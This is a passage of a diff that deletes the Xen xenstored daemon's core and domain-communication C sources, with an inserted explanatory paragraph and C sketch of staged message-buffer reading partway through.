-       struct node *node;
-       struct xs_permissions perms = { .id = 0, .perms = XS_PERM_NONE };
-
-       node = talloc_zero(NULL, struct node);
-       node->name = name;
-       node->perms = &perms;
-       node->num_perms = 1;
-       node->children = (char *)child;
-       if (child)
-               node->childlen = strlen(child) + 1;
-
-       if (!write_node(NULL, node))
-               barf_perror("Could not create initial node %s", name);
-       talloc_free(node);
-}
-
-static void setup_structure(void)
-{
-       char *tdbname;
-       tdbname = talloc_strdup(talloc_autofree_context(), xs_daemon_tdb());
-       tdb_ctx = tdb_open(tdbname, 0, TDB_FLAGS, O_RDWR, 0);
-
-       if (tdb_ctx) {
-               /* XXX When we make xenstored able to restart, this will have
-                  to become cleverer, checking for existing domains and not
-                  removing the corresponding entries, but for now xenstored
-                  cannot be restarted without losing all the registered
-                  watches, which breaks all the backend drivers anyway.  We
-                  can therefore get away with just clearing /local and
-                  expecting Xend to put the appropriate entries back in.
-
-                  When this change is made it is important to note that
-                  dom0's entries must be cleaned up on reboot _before_ this
-                  daemon starts, otherwise the backend drivers and dom0's
-                  balloon driver will pick up stale entries.  In the case of
-                  the balloon driver, this can be fatal.
-               */
-               char *tlocal = talloc_strdup(NULL, "/local");
-
-               check_store();
-
-               if (remove_local) {
-                       internal_rm("/local");
-                       create_node(NULL, tlocal, NULL, 0);
-
-                       check_store();
-               }
-
-               talloc_free(tlocal);
-       }
-       else {
-               tdb_ctx = tdb_open(tdbname, 7919, TDB_FLAGS, O_RDWR|O_CREAT,
-                                  0640);
-               if (!tdb_ctx)
-                       barf_perror("Could not create tdb file %s", tdbname);
-
-               manual_node("/", "tool");
-               manual_node("/tool", "xenstored");
-               manual_node("/tool/xenstored", NULL);
-
-               check_store();
-       }
-}
-
-
-static unsigned int hash_from_key_fn(void *k)
-{
-       char *str = k;
-       unsigned int hash = 5381;
-       char c;
-
-       while ((c = *str++))
-               hash = ((hash << 5) + hash) + (unsigned int)c;
-
-       return hash;
-}
-
-
-static int keys_equal_fn(void *key1, void *key2)
-{
-       return 0 == strcmp((char *)key1, (char *)key2);
-}
-
-
-static char *child_name(const char *s1, const char *s2)
-{
-       if (strcmp(s1, "/")) {
-               return talloc_asprintf(NULL, "%s/%s", s1, s2);
-       }
-       else {
-               return talloc_asprintf(NULL, "/%s", s2);
-       }
-}
-
-
-static void remember_string(struct hashtable *hash, const char *str)
-{
-       char *k = malloc(strlen(str) + 1);
-       strcpy(k, str);
-       hashtable_insert(hash, k, (void *)1);
-}
-
-
-/**
- * A node has a children field that names the children of the node, separated
- * by NULs.  We check whether there are entries in there that are duplicated
- * (and if so, delete the second one), and whether there are any that do not
- * have a corresponding child node (and if so, delete them).  Each valid child
- * is then recursively checked.
- *
- * No deleting is performed if the recovery flag is cleared (i.e. -R was
- * passed on the command line).
- *
- * As we go, we record each node in the given reachable hashtable.  These
- * entries will be used later in clean_store.
- */
-static void check_store_(const char *name, struct hashtable *reachable)
-{
-       struct node *node = read_node(NULL, name);
-
-       if (node) {
-               size_t i = 0;
-
-               struct hashtable * children =
-                       create_hashtable(16, hash_from_key_fn, keys_equal_fn);
-
-               remember_string(reachable, name);
-
-               while (i < node->childlen) {
-                       size_t childlen = strlen(node->children + i);
-                       char * childname = child_name(node->name,
-                                                     node->children + i);
-                       struct node *childnode = read_node(NULL, childname);
-                       
-                       if (childnode) {
-                               if (hashtable_search(children, childname)) {
-                                       log("check_store: '%s' is duplicated!",
-                                           childname);
-
-                                       if (recovery) {
-                                               remove_child_entry(NULL, node,
-                                                                  i);
-                                               i -= childlen + 1;
-                                       }
-                               }
-                               else {
-                                       remember_string(children, childname);
-                                       check_store_(childname, reachable);
-                               }
-                       }
-                       else {
-                               log("check_store: No child '%s' found!\n",
-                                   childname);
-
-                               if (recovery) {
-                                       remove_child_entry(NULL, node, i);
-                                       i -= childlen + 1;
-                               }
-                       }
-
-                       talloc_free(childnode);
-                       talloc_free(childname);
-                       i += childlen + 1;
-               }
-
-               hashtable_destroy(children, 0 /* Don't free values (they are
-                                                all (void *)1) */);
-               talloc_free(node);
-       }
-       else {
-               /* Impossible, because no database should ever be without the
-                  root, and otherwise, we've just checked in our caller
-                  (which made a recursive call to get here). */
-                  
-               log("check_store: No child '%s' found: impossible!", name);
-       }
-}
-
-
-/**
- * Helper to clean_store below.
- */
-static int clean_store_(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA val,
-                       void *private)
-{
-       struct hashtable *reachable = private;
-       char * name = talloc_strndup(NULL, key.dptr, key.dsize);
-
-       if (!hashtable_search(reachable, name)) {
-               log("clean_store: '%s' is orphaned!", name);
-               if (recovery) {
-                       tdb_delete(tdb, key);
-               }
-       }
-
-       talloc_free(name);
-
-       return 0;
-}
-
-
-/**
- * Given the list of reachable nodes, iterate over the whole store, and
- * remove any that were not reached.
- */
-static void clean_store(struct hashtable *reachable)
-{
-       tdb_traverse(tdb_ctx, &clean_store_, reachable);
-}
-
-
-static void check_store(void)
-{
-       char * root = talloc_strdup(NULL, "/");
-       struct hashtable * reachable =
-               create_hashtable(16, hash_from_key_fn, keys_equal_fn);
- 
-       log("Checking store ...");
-       check_store_(root, reachable);
-       clean_store(reachable);
-       log("Checking store complete.");
-
-       hashtable_destroy(reachable, 0 /* Don't free values (they are all
-                                         (void *)1) */);
-       talloc_free(root);
-}
-
-
-/* Something is horribly wrong: check the store. */
-static void corrupt(struct connection *conn, const char *fmt, ...)
-{
-       va_list arglist;
-       char *str;
-       int saved_errno = errno;
-
-       va_start(arglist, fmt);
-       str = talloc_vasprintf(NULL, fmt, arglist);
-       va_end(arglist);
-
-       log("corruption detected by connection %i: err %s: %s",
-           conn ? (int)conn->id : -1, strerror(saved_errno), str);
-
-       check_store();
-}
-
-
-static void write_pidfile(const char *pidfile)
-{
-       char buf[100];
-       int len;
-       int fd;
-
-       fd = open(pidfile, O_RDWR | O_CREAT, 0600);
-       if (fd == -1)
-               barf_perror("Opening pid file %s", pidfile);
-
-       /* We exit silently if daemon already running. */
-       if (lockf(fd, F_TLOCK, 0) == -1)
-               exit(0);
-
-       len = snprintf(buf, sizeof(buf), "%ld\n", (long)getpid());
-       if (write(fd, buf, len) != len)
-               barf_perror("Writing pid file %s", pidfile);
-}
-
-/* Stevens. */
-static void daemonize(void)
-{
-       pid_t pid;
-
-       /* Separate from our parent via fork, so init inherits us. */
-       if ((pid = fork()) < 0)
-               barf_perror("Failed to fork daemon");
-       if (pid != 0)
-               exit(0);
-
-       /* Session leader so ^C doesn't whack us. */
-       setsid();
-
-       /* Let session leader exit so child cannot regain CTTY */
-       if ((pid = fork()) < 0)
-               barf_perror("Failed to fork daemon");
-       if (pid != 0)
-               exit(0);
-
-       /* Move off any mount points we might be in. */
-       if (chdir("/") == -1)
-               barf_perror("Failed to chdir");
-
-       /* Discard our parent's old-fashioned umask prejudices. */
-       umask(0);
-}
-
-
-static void usage(void)
-{
-       fprintf(stderr,
-"Usage:\n"
-"\n"
-"  xenstored <options>\n"
-"\n"
-"where options may include:\n"
-"\n"
-"  --no-domain-init    to state that xenstored should not initialise dom0,\n"
-"  --pid-file <file>   giving a file for the daemon's pid to be written,\n"
-"  --help              to output this message,\n"
-"  --no-fork           to request that the daemon does not fork,\n"
-"  --output-pid        to request that the pid of the daemon is output,\n"
-"  --trace-file <file> giving the file for logging, and\n"
-"  --entry-nb <nb>     limit the number of entries per domain,\n"
-"  --entry-size <size> limit the size of entry per domain, and\n"
-"  --entry-watch <nb>  limit the number of watches per domain,\n"
-"  --transaction <nb>  limit the number of transaction allowed per domain,\n"
-"  --no-recovery       to request that no recovery should be attempted when\n"
-"                      the store is corrupted (debug only),\n"
-"  --preserve-local    to request that /local is preserved on start-up,\n"
-"  --verbose           to request verbose execution.\n");
-}
-
-
-static struct option options[] = {
-       { "no-domain-init", 0, NULL, 'D' },
-       { "entry-nb", 1, NULL, 'E' },
-       { "pid-file", 1, NULL, 'F' },
-       { "help", 0, NULL, 'H' },
-       { "no-fork", 0, NULL, 'N' },
-       { "output-pid", 0, NULL, 'P' },
-       { "entry-size", 1, NULL, 'S' },
-       { "trace-file", 1, NULL, 'T' },
-       { "transaction", 1, NULL, 't' },
-       { "no-recovery", 0, NULL, 'R' },
-       { "preserve-local", 0, NULL, 'L' },
-       { "verbose", 0, NULL, 'V' },
-       { "watch-nb", 1, NULL, 'W' },
-       { NULL, 0, NULL, 0 } };
-
-extern void dump_conn(struct connection *conn); 
-
-int main(int argc, char *argv[])
-{
-       int opt, *sock, *ro_sock, max;
-       struct sockaddr_un addr;
-       fd_set inset, outset;
-       bool dofork = true;
-       bool outputpid = false;
-       bool no_domain_init = false;
-       const char *pidfile = NULL;
-       int evtchn_fd = -1;
-       struct timeval *timeout;
-
-       while ((opt = getopt_long(argc, argv, "DE:F:HNPS:t:T:RLVW:", options,
-                                 NULL)) != -1) {
-               switch (opt) {
-               case 'D':
-                       no_domain_init = true;
-                       break;
-               case 'E':
-                       quota_nb_entry_per_domain = strtol(optarg, NULL, 10);
-                       break;
-               case 'F':
-                       pidfile = optarg;
-                       break;
-               case 'H':
-                       usage();
-                       return 0;
-               case 'N':
-                       dofork = false;
-                       break;
-               case 'P':
-                       outputpid = true;
-                       break;
-               case 'R':
-                       recovery = false;
-                       break;
-               case 'L':
-                       remove_local = false;
-                       break;
-               case 'S':
-                       quota_max_entry_size = strtol(optarg, NULL, 10);
-                       break;
-               case 't':
-                       quota_max_transaction = strtol(optarg, NULL, 10);
-                       break;
-               case 'T':
-                       tracefile = optarg;
-                       break;
-               case 'V':
-                       verbose = true;
-                       break;
-               case 'W':
-                       quota_nb_watch_per_domain = strtol(optarg, NULL, 10);
-                       break;
-               }
-       }
-       if (optind != argc)
-               barf("%s: No arguments desired", argv[0]);
-
-       reopen_log();
-
-       /* make sure xenstored directory exists */
-       if (mkdir(xs_daemon_rundir(), 0755)) {
-               if (errno != EEXIST) {
-                       perror("error: mkdir daemon rundir");
-                       exit(-1);
-               }
-       }
-
-       if (mkdir(xs_daemon_rootdir(), 0755)) {
-               if (errno != EEXIST) {
-                       perror("error: mkdir daemon rootdir");
-                       exit(-1);
-               }
-       }
-
-       if (dofork) {
-               openlog("xenstored", 0, LOG_DAEMON);
-               daemonize();
-       }
-       if (pidfile)
-               write_pidfile(pidfile);
-
-       /* Talloc leak reports go to stderr, which is closed if we fork. */
-       if (!dofork)
-               talloc_enable_leak_report_full();
-
-       /* Create sockets for them to listen to. */
-       sock = talloc(talloc_autofree_context(), int);
-       *sock = socket(PF_UNIX, SOCK_STREAM, 0);
-       if (*sock < 0)
-               barf_perror("Could not create socket");
-       ro_sock = talloc(talloc_autofree_context(), int);
-       *ro_sock = socket(PF_UNIX, SOCK_STREAM, 0);
-       if (*ro_sock < 0)
-               barf_perror("Could not create socket");
-       talloc_set_destructor(sock, destroy_fd);
-       talloc_set_destructor(ro_sock, destroy_fd);
-
-       /* Don't kill us with SIGPIPE. */
-       signal(SIGPIPE, SIG_IGN);
-
-       /* FIXME: Be more sophisticated, don't mug running daemon. */
-       unlink(xs_daemon_socket());
-       unlink(xs_daemon_socket_ro());
-
-       addr.sun_family = AF_UNIX;
-       strcpy(addr.sun_path, xs_daemon_socket());
-       if (bind(*sock, (struct sockaddr *)&addr, sizeof(addr)) != 0)
-               barf_perror("Could not bind socket to %s", xs_daemon_socket());
-       strcpy(addr.sun_path, xs_daemon_socket_ro());
-       if (bind(*ro_sock, (struct sockaddr *)&addr, sizeof(addr)) != 0)
-               barf_perror("Could not bind socket to %s",
-                           xs_daemon_socket_ro());
-       if (chmod(xs_daemon_socket(), 0600) != 0
-           || chmod(xs_daemon_socket_ro(), 0660) != 0)
-               barf_perror("Could not chmod sockets");
-
-       if (listen(*sock, 1) != 0
-           || listen(*ro_sock, 1) != 0)
-               barf_perror("Could not listen on sockets");
-
-       if (pipe(reopen_log_pipe)) {
-               barf_perror("pipe");
-       }
-
-       /* Setup the database */
-       setup_structure();
-
-       /* Listen to hypervisor. */
-       if (!no_domain_init)
-               domain_init();
-
-       /* Restore existing connections. */
-       restore_existing_connections();
-
-       if (outputpid) {
-               printf("%ld\n", (long)getpid());
-               fflush(stdout);
-       }
-
-       /* redirect to /dev/null now we're ready to accept connections */
-       if (dofork) {
-               int devnull = open("/dev/null", O_RDWR);
-               if (devnull == -1)
-                       barf_perror("Could not open /dev/null\n");
-               dup2(devnull, STDIN_FILENO);
-               dup2(devnull, STDOUT_FILENO);
-               dup2(devnull, STDERR_FILENO);
-               close(devnull);
-               xprintf = trace;
-       }
-
-       signal(SIGHUP, trigger_reopen_log);
-
-       if (xce_handle != -1)
-               evtchn_fd = xc_evtchn_fd(xce_handle);
-
-       /* Get ready to listen to the tools. */
-       max = initialize_set(&inset, &outset, *sock, *ro_sock, &timeout);
-
-       /* Tell the kernel we're up and running. */
-       xenbus_notify_running();
-
-       /* Main loop. */
-       for (;;) {
-               struct connection *conn, *next;
-
-               if (select(max+1, &inset, &outset, NULL, timeout) < 0) {
-                       if (errno == EINTR)
-                               continue;
-                       barf_perror("Select failed");
-               }
-
-               if (FD_ISSET(reopen_log_pipe[0], &inset)) {
-                       char c;
-                       if (read(reopen_log_pipe[0], &c, 1) != 1)
-                               barf_perror("read failed");
-                       reopen_log();
-               }
-
-               if (FD_ISSET(*sock, &inset))
-                       accept_connection(*sock, true);
-
-               if (FD_ISSET(*ro_sock, &inset))
-                       accept_connection(*ro_sock, false);
-
-               if (evtchn_fd != -1 && FD_ISSET(evtchn_fd, &inset))
-                       handle_event();
-
-               next = list_entry(connections.next, typeof(*conn), list);
-               while (&next->list != &connections) {
-                       conn = next;
-
-                       next = list_entry(conn->list.next,
-                                         typeof(*conn), list);
-
-                       if (conn->domain) {
-                               talloc_increase_ref_count(conn);
-                               if (domain_can_read(conn))
-                                       handle_input(conn);
-                               if (talloc_free(conn) == 0)
-                                       continue;
-
-                               talloc_increase_ref_count(conn);
-                               if (domain_can_write(conn) &&
-                                   !list_empty(&conn->out_list))
-                                       handle_output(conn);
-                               if (talloc_free(conn) == 0)
-                                       continue;
-                       } else {
-                               talloc_increase_ref_count(conn);
-                               if (FD_ISSET(conn->fd, &inset))
-                                       handle_input(conn);
-                               if (talloc_free(conn) == 0)
-                                       continue;
-
-                               talloc_increase_ref_count(conn);
-                               if (FD_ISSET(conn->fd, &outset))
-                                       handle_output(conn);
-                               if (talloc_free(conn) == 0)
-                                       continue;
-                       }
-               }
-
-               max = initialize_set(&inset, &outset, *sock, *ro_sock,
-                                    &timeout);
-       }
-}
-
-/*
- * Local variables:
- *  c-file-style: "linux"
- *  indent-tabs-mode: t
- *  c-indent-level: 8
- *  c-basic-offset: 8
- *  tab-width: 8
- * End:
- */
diff -r 10a8fae412c5 tools/xenstore/xenstored_core.h
--- a/tools/xenstore/xenstored_core.h   Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,191 +0,0 @@
-/* 
-    Internal interfaces for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#ifndef _XENSTORED_CORE_H
-#define _XENSTORED_CORE_H
-
-#include <xenctrl.h>
-
-#include <sys/types.h>
-#include <dirent.h>
-#include <stdbool.h>
-#include <stdint.h>
-#include <errno.h>
-#include "xs_lib.h"
-#include "list.h"
-#include "tdb.h"
-
-struct buffered_data
-{
-       struct list_head list;
-
-       /* Are we still doing the header? */
-       bool inhdr;
-
-       /* How far are we? */
-       unsigned int used;
-
-       union {
-               struct xsd_sockmsg msg;
-               char raw[sizeof(struct xsd_sockmsg)];
-       } hdr;
-
-       /* The actual data. */
-       char *buffer;
-};
-
-struct connection;
-typedef int connwritefn_t(struct connection *, const void *, unsigned int);
-typedef int connreadfn_t(struct connection *, void *, unsigned int);
-
-struct connection
-{
-       struct list_head list;
-
-       /* The file descriptor we came in on. */
-       int fd;
-
-       /* Who am I? 0 for socket connections. */
-       unsigned int id;
-
-       /* Is this a read-only connection? */
-       bool can_write;
-
-       /* Buffered incoming data. */
-       struct buffered_data *in;
-
-       /* Buffered output data */
-       struct list_head out_list;
-
-       /* Transaction context for current request (NULL if none). */
-       struct transaction *transaction;
-
-       /* List of in-progress transactions. */
-       struct list_head transaction_list;
-       uint32_t next_transaction_id;
-       unsigned int transaction_started;
-
-       /* The domain I'm associated with, if any. */
-       struct domain *domain;
-
-        /* The target of the domain I'm associated with. */
-        struct connection *target;
-
-       /* My watches. */
-       struct list_head watches;
-
-       /* Methods for communicating over this connection: write can be NULL */
-       connwritefn_t *write;
-       connreadfn_t *read;
-};
-extern struct list_head connections;
-
-struct node {
-       const char *name;
-
-       /* Database I came from */
-       TDB_CONTEXT *tdb;
-
-       /* Parent (optional) */
-       struct node *parent;
-
-       /* Permissions. */
-       unsigned int num_perms;
-       struct xs_permissions *perms;
-
-       /* Contents. */
-       unsigned int datalen;
-       void *data;
-
-       /* Children, each nul-terminated. */
-       unsigned int childlen;
-       char *children;
-};
-
-/* Break input into vectors, return the number, fill in up to num of them. */
-unsigned int get_strings(struct buffered_data *data,
-                        char *vec[], unsigned int num);
-
-/* Is child node a child or equal to parent node? */
-bool is_child(const char *child, const char *parent);
-
-void send_reply(struct connection *conn, enum xsd_sockmsg_type type,
-               const void *data, unsigned int len);
-
-/* Some routines (write, mkdir, etc) just need a non-error return */
-void send_ack(struct connection *conn, enum xsd_sockmsg_type type);
-
-/* Send an error: error is usually "errno". */
-void send_error(struct connection *conn, int error);
-
-/* Canonicalize this path if possible. */
-char *canonicalize(struct connection *conn, const char *node);
-
-/* Check if node is an event node. */
-bool check_event_node(const char *node);
-
-/* Get this node, checking we have permissions. */
-struct node *get_node(struct connection *conn,
-                     const char *name,
-                     enum xs_perm_type perm);
-
-/* Get TDB context for this connection */
-TDB_CONTEXT *tdb_context(struct connection *conn);
-
-/* Destructor for tdbs: required for transaction code */
-int destroy_tdb(void *_tdb);
-
-/* Replace the tdb: required for transaction code */
-bool replace_tdb(const char *newname, TDB_CONTEXT *newtdb);
-
-struct connection *new_connection(connwritefn_t *write, connreadfn_t *read);
-
-
-/* Is this a valid node name? */
-bool is_valid_nodename(const char *node);
-
-/* Tracing infrastructure. */
-void trace_create(const void *data, const char *type);
-void trace_destroy(const void *data, const char *type);
-void trace_watch_timeout(const struct connection *conn, const char *node, const char *token);
-void trace(const char *fmt, ...);
-void dtrace_io(const struct connection *conn, const struct buffered_data *data, int out);
-
-extern int event_fd;
-
-/* Map the kernel's xenstore page. */
-void *xenbus_map(void);
-
-/* Return the event channel used by xenbus. */
-evtchn_port_t xenbus_evtchn(void);
-
-/* Tell the kernel xenstored is running. */
-void xenbus_notify_running(void);
-
-#endif /* _XENSTORED_CORE_H */
-
-/*
- * Local variables:
- *  c-file-style: "linux"
- *  indent-tabs-mode: t
- *  c-indent-level: 8
- *  c-basic-offset: 8
- *  tab-width: 8
- * End:
- */
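
For readers following the removal of xenstored_core.h: the inhdr/used/hdr fields of struct buffered_data suggest a two-stage read, where the fixed-size header is filled first and the payload afterwards. The code that drives those fields is not part of this hunk, so the following is only a rough sketch of how such a structure could be fed incrementally. struct msg_hdr is a stand-in for struct xsd_sockmsg, and in_buf, in_buf_init, in_buf_feed and MAX_PAYLOAD are hypothetical names made up for illustration.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MAX_PAYLOAD 4096u  /* assumed cap on payload size, for illustration */

/* Stand-in for struct xsd_sockmsg: four 32-bit fields. */
struct msg_hdr {
    uint32_t type, req_id, tx_id, len;
};

struct in_buf {
    bool inhdr;         /* still filling the header? */
    unsigned int used;  /* bytes filled in the current stage */
    union {
        struct msg_hdr msg;
        char raw[sizeof(struct msg_hdr)];
    } hdr;
    char *buffer;       /* payload, allocated once the header is complete */
};

static void in_buf_init(struct in_buf *in)
{
    memset(in, 0, sizeof(*in));
    in->inhdr = true;
}

/*
 * Consume up to len bytes from src. Returns the number of bytes consumed,
 * or -1 on an oversized payload or allocation failure. *done is set once
 * a complete message (header plus payload) has been buffered.
 */
static int in_buf_feed(struct in_buf *in, const char *src,
                       unsigned int len, bool *done)
{
    unsigned int want, n;

    *done = false;
    if (in->inhdr) {
        want = sizeof(in->hdr.raw) - in->used;
        n = len < want ? len : want;
        memcpy(in->hdr.raw + in->used, src, n);
        in->used += n;
        if (in->used < sizeof(in->hdr.raw))
            return (int)n;

        /* Header complete: validate it and switch to the payload stage. */
        if (in->hdr.msg.len > MAX_PAYLOAD)
            return -1;
        in->buffer = malloc(in->hdr.msg.len ? in->hdr.msg.len : 1);
        if (!in->buffer)
            return -1;
        in->inhdr = false;
        in->used = 0;
        *done = (in->hdr.msg.len == 0);
        return (int)n;
    }

    want = in->hdr.msg.len - in->used;
    n = len < want ? len : want;
    memcpy(in->buffer + in->used, src, n);
    in->used += n;
    *done = (in->used == in->hdr.msg.len);
    return (int)n;
}
```

The caller would keep calling in_buf_feed() with whatever bytes arrive until *done is set, which is why a short read in the middle of the header is not an error here.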
diff -r 10a8fae412c5 tools/xenstore/xenstored_domain.c
--- a/tools/xenstore/xenstored_domain.c Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,710 +0,0 @@
-/*
-    Domain communications for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#include <stdio.h>
-#include <sys/mman.h>
-#include <unistd.h>
-#include <stdlib.h>
-#include <stdarg.h>
-
-#include "utils.h"
-#include "talloc.h"
-#include "xenstored_core.h"
-#include "xenstored_domain.h"
-#include "xenstored_transaction.h"
-#include "xenstored_watch.h"
-
-#include <xenctrl.h>
-
-static int *xc_handle;
-static evtchn_port_t virq_port;
-
-int xce_handle = -1; 
-
-struct domain
-{
-       struct list_head list;
-
-       /* The id of this domain */
-       unsigned int domid;
-
-       /* Event channel port */
-       evtchn_port_t port;
-
-       /* The remote end of the event channel, used only to validate
-          repeated domain introductions. */
-       evtchn_port_t remote_port;
-
-       /* The mfn associated with the event channel, used only to validate
-          repeated domain introductions. */
-       unsigned long mfn;
-
-       /* Domain path in store. */
-       char *path;
-
-       /* Shared page. */
-       struct xenstore_domain_interface *interface;
-
-       /* The connection associated with this. */
-       struct connection *conn;
-
-       /* Have we noticed that this domain is shutdown? */
-       int shutdown;
-
-       /* number of entry from this domain in the store */
-       int nbentry;
-
-       /* number of watch for this domain */
-       int nbwatch;
-};
-
-static LIST_HEAD(domains);
-
-static bool check_indexes(XENSTORE_RING_IDX cons, XENSTORE_RING_IDX prod)
-{
-       return ((prod - cons) <= XENSTORE_RING_SIZE);
-}
-
-static void *get_output_chunk(XENSTORE_RING_IDX cons,
-                             XENSTORE_RING_IDX prod,
-                             char *buf, uint32_t *len)
-{
-       *len = XENSTORE_RING_SIZE - MASK_XENSTORE_IDX(prod);
-       if ((XENSTORE_RING_SIZE - (prod - cons)) < *len)
-               *len = XENSTORE_RING_SIZE - (prod - cons);
-       return buf + MASK_XENSTORE_IDX(prod);
-}
-
-static const void *get_input_chunk(XENSTORE_RING_IDX cons,
-                                  XENSTORE_RING_IDX prod,
-                                  const char *buf, uint32_t *len)
-{
-       *len = XENSTORE_RING_SIZE - MASK_XENSTORE_IDX(cons);
-       if ((prod - cons) < *len)
-               *len = prod - cons;
-       return buf + MASK_XENSTORE_IDX(cons);
-}
-
-static int writechn(struct connection *conn,
-                   const void *data, unsigned int len)
-{
-       uint32_t avail;
-       void *dest;
-       struct xenstore_domain_interface *intf = conn->domain->interface;
-       XENSTORE_RING_IDX cons, prod;
-
-       /* Must read indexes once, and before anything else, and verified. */
-       cons = intf->rsp_cons;
-       prod = intf->rsp_prod;
-       xen_mb();
-
-       if (!check_indexes(cons, prod)) {
-               errno = EIO;
-               return -1;
-       }
-
-       dest = get_output_chunk(cons, prod, intf->rsp, &avail);
-       if (avail < len)
-               len = avail;
-
-       memcpy(dest, data, len);
-       xen_mb();
-       intf->rsp_prod += len;
-
-       xc_evtchn_notify(xce_handle, conn->domain->port);
-
-       return len;
-}
-
-static int readchn(struct connection *conn, void *data, unsigned int len)
-{
-       uint32_t avail;
-       const void *src;
-       struct xenstore_domain_interface *intf = conn->domain->interface;
-       XENSTORE_RING_IDX cons, prod;
-
-       /* Must read indexes once, and before anything else, and verified. */
-       cons = intf->req_cons;
-       prod = intf->req_prod;
-       xen_mb();
-
-       if (!check_indexes(cons, prod)) {
-               errno = EIO;
-               return -1;
-       }
-
-       src = get_input_chunk(cons, prod, intf->req, &avail);
-       if (avail < len)
-               len = avail;
-
-       memcpy(data, src, len);
-       xen_mb();
-       intf->req_cons += len;
-
-       xc_evtchn_notify(xce_handle, conn->domain->port);
-
-       return len;
-}
-
-static int destroy_domain(void *_domain)
-{
-       struct domain *domain = _domain;
-
-       list_del(&domain->list);
-
-       if (domain->port) {
-               if (xc_evtchn_unbind(xce_handle, domain->port) == -1)
-                       eprintf("> Unbinding port %i failed!\n", domain->port);
-       }
-
-       if (domain->interface)
-               munmap(domain->interface, getpagesize());
-
-       fire_watches(NULL, "@releaseDomain", false);
-
-       return 0;
-}
-
-static void domain_cleanup(void)
-{
-       xc_dominfo_t dominfo;
-       struct domain *domain, *tmp;
-       int notify = 0;
-
-       list_for_each_entry_safe(domain, tmp, &domains, list) {
-               if (xc_domain_getinfo(*xc_handle, domain->domid, 1,
-                                     &dominfo) == 1 &&
-                   dominfo.domid == domain->domid) {
-                       if ((dominfo.crashed || dominfo.shutdown)
-                           && !domain->shutdown) {
-                               domain->shutdown = 1;
-                               notify = 1;
-                       }
-                       if (!dominfo.dying)
-                               continue;
-               }
-               talloc_free(domain->conn);
-               notify = 0; /* destroy_domain() fires the watch */
-       }
-
-       if (notify)
-               fire_watches(NULL, "@releaseDomain", false);
-}
-
-/* We scan all domains rather than use the information given here. */
-void handle_event(void)
-{
-       evtchn_port_t port;
-
-       if ((port = xc_evtchn_pending(xce_handle)) == -1)
-               barf_perror("Failed to read from event fd");
-
-       if (port == virq_port)
-               domain_cleanup();
-
-       if (xc_evtchn_unmask(xce_handle, port) == -1)
-               barf_perror("Failed to write to event fd");
-}
-
-bool domain_can_read(struct connection *conn)
-{
-       struct xenstore_domain_interface *intf = conn->domain->interface;
-       return (intf->req_cons != intf->req_prod);
-}
-
-bool domain_is_unprivileged(struct connection *conn)
-{
-       return (conn && conn->domain && conn->domain->domid != 0);
-}
-
-bool domain_can_write(struct connection *conn)
-{
-       struct xenstore_domain_interface *intf = conn->domain->interface;
-       return ((intf->rsp_prod - intf->rsp_cons) != XENSTORE_RING_SIZE);
-}
-
-static char *talloc_domain_path(void *context, unsigned int domid)
-{
-       return talloc_asprintf(context, "/local/domain/%u", domid);
-}
-
-static struct domain *new_domain(void *context, unsigned int domid,
-                                int port)
-{
-       struct domain *domain;
-       int rc;
-
-       domain = talloc(context, struct domain);
-       domain->port = 0;
-       domain->shutdown = 0;
-       domain->domid = domid;
-       domain->path = talloc_domain_path(domain, domid);
-
-       list_add(&domain->list, &domains);
-       talloc_set_destructor(domain, destroy_domain);
-
-       /* Tell kernel we're interested in this event. */
-       rc = xc_evtchn_bind_interdomain(xce_handle, domid, port);
-       if (rc == -1)
-           return NULL;
-       domain->port = rc;
-
-       domain->conn = new_connection(writechn, readchn);
-       domain->conn->domain = domain;
-       domain->conn->id = domid;
-
-       domain->remote_port = port;
-       domain->nbentry = 0;
-       domain->nbwatch = 0;
-
-       return domain;
-}
-
-
-static struct domain *find_domain_by_domid(unsigned int domid)
-{
-       struct domain *i;
-
-       list_for_each_entry(i, &domains, list) {
-               if (i->domid == domid)
-                       return i;
-       }
-       return NULL;
-}
-
-static void domain_conn_reset(struct domain *domain)
-{
-       struct connection *conn = domain->conn;
-       struct buffered_data *out;
-
-       conn_delete_all_watches(conn);
-       conn_delete_all_transactions(conn);
-
-       while ((out = list_top(&conn->out_list, struct buffered_data, list))) {
-               list_del(&out->list);
-               talloc_free(out);
-       }
-
-       talloc_free(conn->in->buffer);
-       memset(conn->in, 0, sizeof(*conn->in));
-       conn->in->inhdr = true;
-
-       domain->interface->req_cons = domain->interface->req_prod = 0;
-       domain->interface->rsp_cons = domain->interface->rsp_prod = 0;
-}
-
-/* domid, mfn, evtchn, path */
-void do_introduce(struct connection *conn, struct buffered_data *in)
-{
-       struct domain *domain;
-       char *vec[3];
-       unsigned int domid;
-       unsigned long mfn;
-       evtchn_port_t port;
-       int rc;
-       struct xenstore_domain_interface *interface;
-
-       if (get_strings(in, vec, ARRAY_SIZE(vec)) < ARRAY_SIZE(vec)) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if (conn->id != 0 || !conn->can_write) {
-               send_error(conn, EACCES);
-               return;
-       }
-
